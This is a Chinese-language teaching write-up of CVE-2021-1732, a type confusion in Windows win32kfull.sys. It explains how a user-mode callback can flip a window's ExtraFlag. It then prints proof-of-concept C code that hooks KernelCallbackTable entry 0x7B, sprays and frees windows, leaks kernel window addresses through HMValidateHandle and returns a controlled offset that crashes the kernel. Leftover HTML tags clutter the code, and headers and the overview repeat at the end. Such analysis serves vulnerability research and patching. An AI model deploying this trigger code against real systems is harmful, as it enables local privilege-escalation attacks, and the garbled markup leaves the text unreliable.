CVE-2021-1732 Win32k漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
CVE-2021-1732是Windows内核模块win32kfull.sys中的一个Type Confusion漏洞，存在于`win32kfull!xxxClientAllocWindowClassExtraBytes<\/code>函数中。攻击者可以利用此漏洞进行越界读写，最终实现本地提权。<\/p>`

受影响版本<\/h3>

Windows 10 Version 1803\/1809\/1909\/2004\/20h2<\/li>
Windows Server, version 1909\/20H2 (Server Core installation)<\/li>
Windows 10 Version for 32-bit Systems<\/li>
Windows Server 2019<\/li>
<\/ul>
漏洞分析<\/h2>
漏洞背景<\/h3>
Windows窗口创建过程中，当注册自定义窗口类时，需要填充tagWNDCLASSA<\/code>结构体：<\/p>
typedef<\/span> struct<\/span> tagWNDCLASSA {
<\/span><\/span>    UINT style;
<\/span><\/span>    WNDPROC lpfnWndProc;
<\/span><\/span>    int<\/span> cbClsExtra;
<\/span><\/span>    int<\/span> cbWndExtra;
<\/span><\/span>    HINSTANCE hInstance;
<\/span><\/span>    HICON hIcon;
<\/span><\/span>    HCURSOR hCursor;
<\/span><\/span>    HBRUSH hbrBackground;
<\/span><\/span>    LPCSTR lpszMenuName;
<\/span><\/span>    LPCSTR lpszClassName;
<\/span><\/span>} WNDCLASSA, *<\/span>PWNDCLASSA, *<\/span>NPWNDCLASSA, *<\/span>LPWNDCLASSA;
<\/span><\/span><\/code><\/pre>当cbWndExtra<\/code>成员不为0时，会调用win32kfull!xxxClientAllocWindowClassExtraBytes<\/code>函数分配额外内存。<\/p>
漏洞根源<\/h3>
漏洞存在于win32kfull!xxxCreateWindowEx<\/code>函数中，具体是与tagWND<\/code>结构体的两个关键成员相关：<\/p>

pExtraBytes<\/code> (offset: 0x128) - 存储额外字节的指针或偏移<\/li>
ExtraFlag<\/code> (offset: 0xe8) - 控制pExtraBytes<\/code>的解释方式<\/li>
<\/ol>
正常情况下：<\/p>

当ExtraFlag & 0x800 == 0<\/code>时，pExtraBytes<\/code>表示内存指针<\/li>
当ExtraFlag & 0x800 != 0<\/code>时，pExtraBytes<\/code>表示内存偏移<\/li>
<\/ul>
漏洞产生的原因是：在执行完win32kfull!xxxClientAllocWindowClassExtraBytes<\/code>函数后，没有对tagWND<\/code>的ExtraFlag<\/code>进行校验。攻击者可以在回调函数中修改ExtraFlag<\/code>并控制pExtraBytes<\/code>的值，导致类型混淆和越界读写。<\/p>
关键函数分析<\/h3>
win32kfull!xxxClientAllocWindowClassExtraBytes<\/h4>
volatile<\/span> void<\/span>*<\/span> __fastcall<\/span> xxxClientAllocWindowClassExtraBytes<\/span>(SIZE_T Length) {
<\/span><\/span>    \/\/ 调用KeUserModeCallback返回到用户态执行回调
<\/span><\/span><\/span><\/span>    v2 =<\/span> KeUserModeCallback(0x7B<\/span>i64, &<\/span>v12, 4<\/span>i64, &<\/span>v7, &<\/span>v11);
<\/span><\/span>    \/\/ 回调返回后处理结果
<\/span><\/span><\/span><\/span>    v4 =<\/span> v8;
<\/span><\/span>    ProbeForRead(v4, v1, CurrentProcessWow64Process !=<\/span> 0<\/span> ?<\/span> 1<\/span> :<\/span> 4<\/span>);
<\/span><\/span>    return<\/span> v4;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>用户态回调函数 user32!_xxxClientAllocWindowClassExtraBytes<\/h4>
NTSTATUS __fastcall<\/span> _xxxClientAllocWindowClassExtraBytes<\/span>(unsigned<\/span> int<\/span>*<\/span> a1) {
<\/span><\/span>    Result =<\/span> RtlAllocateHeap(pUserHeap, 8u<\/span>, *<\/span>a1);
<\/span><\/span>    return<\/span> NtCallbackReturn(&<\/span>Result, 0x18u<\/span>, 0<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用流程<\/h3>

创建窗口时设置cbWndExtra<\/code>不为0，触发xxxClientAllocWindowClassExtraBytes<\/code>调用<\/li>
在用户态回调函数中：

修改tagWND<\/code>的ExtraFlag<\/code>使其|= 0x800<\/code><\/li>
通过NtCallbackReturn<\/code>返回一个可控的偏移值<\/li>
<\/ul>
<\/li>
内核继续执行，将返回的偏移值赋给pExtraBytes<\/code><\/li>
后续操作中，内核会将偏移值当作指针使用，导致越界读写<\/li>
<\/ol>
漏洞利用实现<\/h2>
关键问题解决<\/h3>


获取窗口句柄<\/strong>：<\/p>

创建多个窗口并销毁部分窗口<\/li>
创建触发漏洞的窗口，它会重用已释放窗口的内存<\/li>
通过HMValidateHandle<\/code>泄露窗口地址，比较pExtraBytes<\/code>值找到目标窗口<\/li>
<\/ul>
<\/li>

修改ExtraFlag<\/strong>：<\/p>

使用NtUserConsoleControl<\/code> API调用win32kfull!xxxConsoleControl<\/code>函数<\/li>
该函数可以设置tagWND<\/code>的ExtraFlag<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
POC关键代码<\/h3>
获取关键函数地址<\/h4>
VOID InitFunction<\/span>() {
<\/span><\/span>    HMODULE hNtdll =<\/span> LoadLibraryA("ntdll.dll"<\/span>), hWin =<\/span> LoadLibraryA("win32u.dll"<\/span>), hUser =<\/span> LoadLibraryA("user32.dll"<\/span>);
<\/span><\/span>    global::<\/span>NtCallbackReturn =<\/span> (pNtCallbackReturn)GetProcAddress(hNtdll, "NtCallbackReturn"<\/span>);
<\/span><\/span>    global::<\/span>NtUserConsoleControl =<\/span> (pNtUserConsoleControl)GetProcAddress(hWin, "NtUserConsoleControl"<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 搜索HMValidateHandle函数地址
<\/span><\/span><\/span><\/span>    PBYTE isMenu =<\/span> (PBYTE)GetProcAddress(hUser, "IsMenu"<\/span>);
<\/span><\/span>    while<\/span> (*<\/span>isMenu++<\/span> !=<\/span> 0xe8<\/span>);
<\/span><\/span>    global::<\/span>HMValidateHandle =<\/span> (pHMValidateHandle)(isMenu +<\/span> 4<\/span> +<\/span> (*<\/span>(PLONG32)isMenu));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>挂钩回调函数<\/h4>
VOID HookCallBack<\/span>() {
<\/span><\/span>    ULONG64 KernelCallbackTable =<\/span> *<\/span>(PULONG64)(__readgsqword(0x60<\/span>) +<\/span> 0x58<\/span>);
<\/span><\/span>    ULONG64 target =<\/span> KernelCallbackTable +<\/span> (0x7B<\/span> *<\/span> 8<\/span>);
<\/span><\/span>    VirtualProtect((LPVOID)target, 0x100<\/span>, PAGE_EXECUTE_READWRITE, &<\/span>oldProtect);
<\/span><\/span>    global::<\/span>orginCallBack =<\/span> (pCallBack)(*<\/span>(PULONG64)target);
<\/span><\/span>    *<\/span>(PULONG64)target =<\/span> (ULONG64)FakeCallBack;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>自定义回调函数<\/h4>
VOID FakeCallBack<\/span>(PULONG32 para) {
<\/span><\/span>    if<\/span> (*<\/span>para ==<\/span> global::<\/span>magicNum &&<\/span> global::<\/span>flag) {
<\/span><\/span>        \/\/ 查找目标窗口
<\/span><\/span><\/span><\/span>        for<\/span> (ULONG32 idx =<\/span> 2<\/span>; idx <<\/span> 20<\/span>; ++<\/span>idx) {
<\/span><\/span>            if<\/span> (*<\/span>(PULONG64)(global::<\/span>pWnds[idx] +<\/span> 0xc8<\/span>) ==<\/span> global::<\/span>magicNum) {
<\/span><\/span>                target =<\/span> (HWND)*<\/span>(PULONG64)global::<\/span>pWnds[idx];
<\/span><\/span>                break<\/span>;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        \/\/ 设置ExtraFlag
<\/span><\/span><\/span><\/span>        ULONG64 buffer1[2<\/span>] =<\/span> { (ULONG64)target, 0<\/span> };
<\/span><\/span>        global::<\/span>NtUserConsoleControl(6<\/span>, buffer1, 0x10<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 返回可控偏移
<\/span><\/span><\/span><\/span>        ULONG64 buffer2[3<\/span>] =<\/span> { 0x1234<\/span>, 0<\/span>, 0<\/span> };
<\/span><\/span>        global::<\/span>NtCallbackReturn(buffer2, 0x18<\/span>, 0<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> global::<\/span>orginCallBack(para);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>窗口创建与销毁<\/h4>
int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 注册窗口类
<\/span><\/span><\/span><\/span>    WNDCLASSA wc{ 0<\/span> };
<\/span><\/span>    wc.lpfnWndProc =<\/span> WindowProc;
<\/span><\/span>    wc.hInstance =<\/span> hInstance;
<\/span><\/span>    wc.lpszClassName =<\/span> "Normal"<\/span>;
<\/span><\/span>    wc.cbWndExtra =<\/span> 0x10<\/span>;
<\/span><\/span>    ATOM normalClass =<\/span> RegisterClassA(&<\/span>wc);
<\/span><\/span>    
<\/span><\/span>    wc.lpszClassName =<\/span> "Magic"<\/span>;
<\/span><\/span>    wc.cbWndExtra =<\/span> global::<\/span>magicNum;
<\/span><\/span>    ATOM magicClass =<\/span> RegisterClassA(&<\/span>wc);
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建多个窗口
<\/span><\/span><\/span><\/span>    for<\/span> (ULONG32 idx =<\/span> 0<\/span>; idx <<\/span> 20<\/span>; ++<\/span>idx) {
<\/span><\/span>        global::<\/span>hWnds[idx] =<\/span> CreateWindowExA(0x8000000<\/span>, "Normal"<\/span>, "NormalWnd"<\/span>, 0x8000000<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, hInstance, NULL);
<\/span><\/span>        global::<\/span>pWnds[idx] =<\/span> global::<\/span>HMValidateHandle((HMENU)global::<\/span>hWnds[idx], 1<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 销毁部分窗口
<\/span><\/span><\/span><\/span>    for<\/span> (ULONG32 idx =<\/span> 2<\/span>; idx <<\/span> 20<\/span>; ++<\/span>idx) {
<\/span><\/span>        DestroyWindow(global::<\/span>hWnds[idx]);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建触发漏洞的窗口
<\/span><\/span><\/span><\/span>    global::<\/span>flag =<\/span> TRUE;
<\/span><\/span>    HWND hMagic =<\/span> CreateWindowExA(0x8000000<\/span>, "Magic"<\/span>, "MagicWnd"<\/span>, 0x8000000<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, hInstance, NULL);
<\/span><\/span>    DestroyWindow(hMagic); \/\/ 触发漏洞
<\/span><\/span><\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>调试分析<\/h2>


在回调函数中设置断点，查看用户态tagWND<\/code>结构：<\/p>

首地址存储窗口句柄<\/li>
偏移0xc8处为特殊数值0xabcd<\/li>
<\/ul>
<\/li>

跟踪xxxConsoleControl<\/code>函数：<\/p>

函数执行前，ExtraFlag<\/code>未设置<\/li>
函数执行后，ExtraFlag |= 0x800<\/code><\/li>
<\/ul>
<\/li>

在xxxCreateWindowEx<\/code>中调用xxxClientAllocWindowClassExtraBytes<\/code>后下断点：<\/p>

可以看到返回的偏移值0x1234被赋给pExtraBytes<\/code><\/li>
<\/ul>
<\/li>

最终执行DestroyWindow<\/code>时会触发蓝屏，因为内核将偏移值当作指针使用。<\/p>
<\/li>
<\/ol>
总结<\/h2>
CVE-2021-1732漏洞的核心在于：<\/p>

内核未校验回调函数返回后ExtraFlag<\/code>的状态<\/li>
攻击者可以控制pExtraBytes<\/code>被解释为偏移而非指针<\/li>
通过精心构造的偏移值实现越界读写<\/li>
<\/ol>
完整POC代码可参考：GitHub链接<\/a><\/p>
CVE-2021-1732 Win32k漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> CVE-2021-1732是Windows内核模块win32kfull.sys中的一个Type Confusion漏洞，存在于win32kfull!xxxClientAllocWindowClassExtraBytes<\/code>函数中。攻击者可以利用此漏洞进行越界读写，最终实现本地提权。<\/p>

漏洞分析<\/h2>

漏洞利用实现<\/h2>

POC关键代码<\/h3>

漏洞概述<\/h2>
CVE-2021-1732是Windows内核模块win32kfull.sys中的一个Type Confusion漏洞，存在于`win32kfull!xxxClientAllocWindowClassExtraBytes<\/code>函数中。攻击者可以利用此漏洞进行越界读写，最终实现本地提权。<\/p>`
